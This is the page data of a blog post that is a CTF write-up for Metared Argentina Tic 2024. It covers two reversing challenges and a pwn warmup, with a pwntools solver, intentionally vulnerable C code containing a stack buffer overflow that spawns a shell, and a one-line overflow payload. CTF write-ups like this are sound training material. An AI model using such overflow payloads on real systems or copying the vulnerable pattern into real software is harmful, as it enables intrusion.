{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-metared-argentina-tic-2024-en","result":{"data":{"markdownRemark":{"id":"11ced4aa-d508-5250-aab4-4deba7f1148e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-metared-argentina-tic-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in a CTF called Metared Argentina Tic 2024.</p>\n<p>There was almost no Rev, and the Pwn server kept going down, so it was not a very fun CTF, but I will still jot down a quick writeup.</p>\n<h2 id=\"baby-rev-rev\" style=\"position:relative;\"><a href=\"#baby-rev-rev\" aria-label=\"baby rev rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Baby rev (Rev)</h2>\n<blockquote>\n<p>Meet my expectations to get the flag</p>\n</blockquote>\n<p>Analyzing the binary showed that it tries to create a file at <code class=\"language-text\">/tmp/superSecretDirectory/SuperDuperSecretFlag.txt</code>.</p>\n<p>After creating the <code class=\"language-text\">superSecretDirectory</code> directory and running the program, I was able to obtain the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/bb3b7/image-20241108202617509.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 23.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6ElEQVQY032NbW+DIBRGETGTFy0iUNF167opapf9/3/3DGmyZMmyDyeH3HDPJZdbwOU6wvoB19sHtvsX5rhhXtYfL+ueWbfEGhMr9n3Hft+zY1wwz3NyBAlRQvYMygQ0fUBrJ5zcM1r3sNQuz/X5FXaY4JzFEAaMY4D3LuGhtYaUEkIIkLdPnxYFRNunZQvVeagUOULHmzcd5Mk+jukexnQ52LYNOK8THEqpzBEl07uBHTXO0wuMG1LYgCuNOnH4STSo5Skf5LJBURDQkoIx9ieEVRQlOz5UyRUKWv6moNm0ZMkUhJB/+QZRjnesq1ZBxAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/8ac56/image-20241108202617509.webp 240w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/d3be9/image-20241108202617509.webp 480w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/e46b2/image-20241108202617509.webp 960w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/52f78/image-20241108202617509.webp 1211w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/8ff5a/image-20241108202617509.png 240w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/e85cb/image-20241108202617509.png 480w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/d9199/image-20241108202617509.png 960w,\n/static/c1d9f51f9d93a69eed17f1f01e96f636/bb3b7/image-20241108202617509.png 1211w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c1d9f51f9d93a69eed17f1f01e96f636/d9199/image-20241108202617509.png\"\n            alt=\"image-20241108202617509\"\n            title=\"image-20241108202617509\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"poke-2-can-you-defeat-gary-rev\" style=\"position:relative;\"><a href=\"#poke-2-can-you-defeat-gary-rev\" aria-label=\"poke 2 can you defeat gary rev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Poke 2: Can you defeat Gary? (Rev)</h2>\n<p>It looks like you can get the flag by winning the Pokémon battle, but if you just enter commands normally, the opponent is far too strong to beat.</p>\n<p>However, if you use item number 5 on number 7, which does not exist in the menu choices, you can win the battle.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 96.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB80lEQVQ4y61Ua5OaQBDEB0/lDXcgIoqAr9LL//9znekxmrtKYhnrPnTtLsv2znTPrNH0Jeo+x3Kboz+0aNoezbrBsBvQDz3WmwZ5nmFRLVAJ0jRFFEeIk1jmia5HoxEMw7giTTPEUYIojFEUBRL5MUkShFGIRA6EYaBzjn7gw5t5GI9HgvEddzIiy1PEcuNMfiRBFEV62HUduJ779ednUK9q7CS9Zb3E21sO27H/vPV/8F68YyWkjMpxnN8boxcJGdHL0fwNRVmAyLJUR8syBZbCNE01YWpO4XneVzf/SSgpH08HlIsSaymXru/QbjcyblWKQUonyzKkciFJeYlt23DENE9M4zdKxZHBGKVExcPrzVrr7HDcY9XU2MialwVBoJEHojHXrEkedl1XKmOmuM2ZlVEtF+i6rZgSohanSZrJIRZutayUkBEQ8/lcyR6mzNCn0+n3mcJCZgH7/vV2Yi5z6sQ0rhHasu9LhNf0HprDgr58nLHbD9gfdjhfzpq+Kc6yW9hB1Oamm+r0KMKFuPvx44Jt1yohyRndyylTeJLw5WBP8yH43HpP1d5n3PT6NlNm89kv8X3ViWv2tc5FPz5Z1PNpQup2Oh21U9p2o53RS7fwQeXDUZal1t/ThHyV2W40px86dXgymegmR8u27utn8BMmR6R2bKTPJgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/767ac030d3464efaee053a40f9341ddd/8ac56/image-20241108210729888.webp 240w,\n/static/767ac030d3464efaee053a40f9341ddd/d3be9/image-20241108210729888.webp 480w,\n/static/767ac030d3464efaee053a40f9341ddd/39392/image-20241108210729888.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/767ac030d3464efaee053a40f9341ddd/8ff5a/image-20241108210729888.png 240w,\n/static/767ac030d3464efaee053a40f9341ddd/e85cb/image-20241108210729888.png 480w,\n/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/767ac030d3464efaee053a40f9341ddd/47ff6/image-20241108210729888.png\"\n            alt=\"image-20241108210729888\"\n            title=\"image-20241108210729888\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I was able to get the flag with the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./pokemaster\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"pokemaster.ctf.cert.unlp.edu.ar\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">35001</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\n<span class=\"token comment\"># Exploit</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"3\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"5\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"7\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"warmup-pwn\" style=\"position:relative;\"><a href=\"#warmup-pwn\" aria-label=\"warmup pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Warmup (Pwn)</h2>\n<p>The following source code is provided.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token comment\">// gcc -Wall -fno-stack-protector -z execstack -no-pie -o reto reto.c</span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/types.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n \n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n \n  <span class=\"token keyword\">int</span> var<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> check <span class=\"token operator\">=</span> <span class=\"token number\">0x12345678</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">20</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span><span class=\"token number\">45</span><span class=\"token punctuation\">,</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"\\n[buf]: %s\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[check] %p\\n\"</span><span class=\"token punctuation\">,</span> check<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>check <span class=\"token operator\">!=</span> <span class=\"token number\">0x12345678</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token punctuation\">(</span>check <span class=\"token operator\">!=</span> <span class=\"token number\">0x54524543</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">printf</span> <span class=\"token punctuation\">(</span><span class=\"token string\">\"\\nClooosse!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n \n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>check <span class=\"token operator\">==</span> <span class=\"token number\">0x54524543</span><span class=\"token punctuation\">)</span>\n   <span class=\"token punctuation\">{</span>\n     <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Yeah!! You win!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">setreuid</span><span class=\"token punctuation\">(</span><span class=\"token function\">geteuid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">geteuid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/bash\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n     <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Byee!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n   <span class=\"token punctuation\">}</span>\n   <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>A simple exploit like the following worked. (The server was still down even after 12 hours, so I did not obtain the flag…)</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> -e <span class=\"token string\">\"AAAAAAAAAAAAAAAAAAAAAAAAAAAACERT\"</span> <span class=\"token operator\">|</span> ./reto</code></pre></div>","fields":{"slug":"/ctf-metared-argentina-tic-2024-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-11-19","description":"A writeup for Metared Argentina Tic 2024.","tags":["CTF (en)","Rev (en)","Pwn (en)","English"],"title":"Metared Argentina Tic 2024 Writeup","socialImage":{"publicURL":"/static/894b620141381318529941e47448a923/ctf-metared-argentina-tic-2024.png"}}}},"pageContext":{"slug":"/ctf-metared-argentina-tic-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}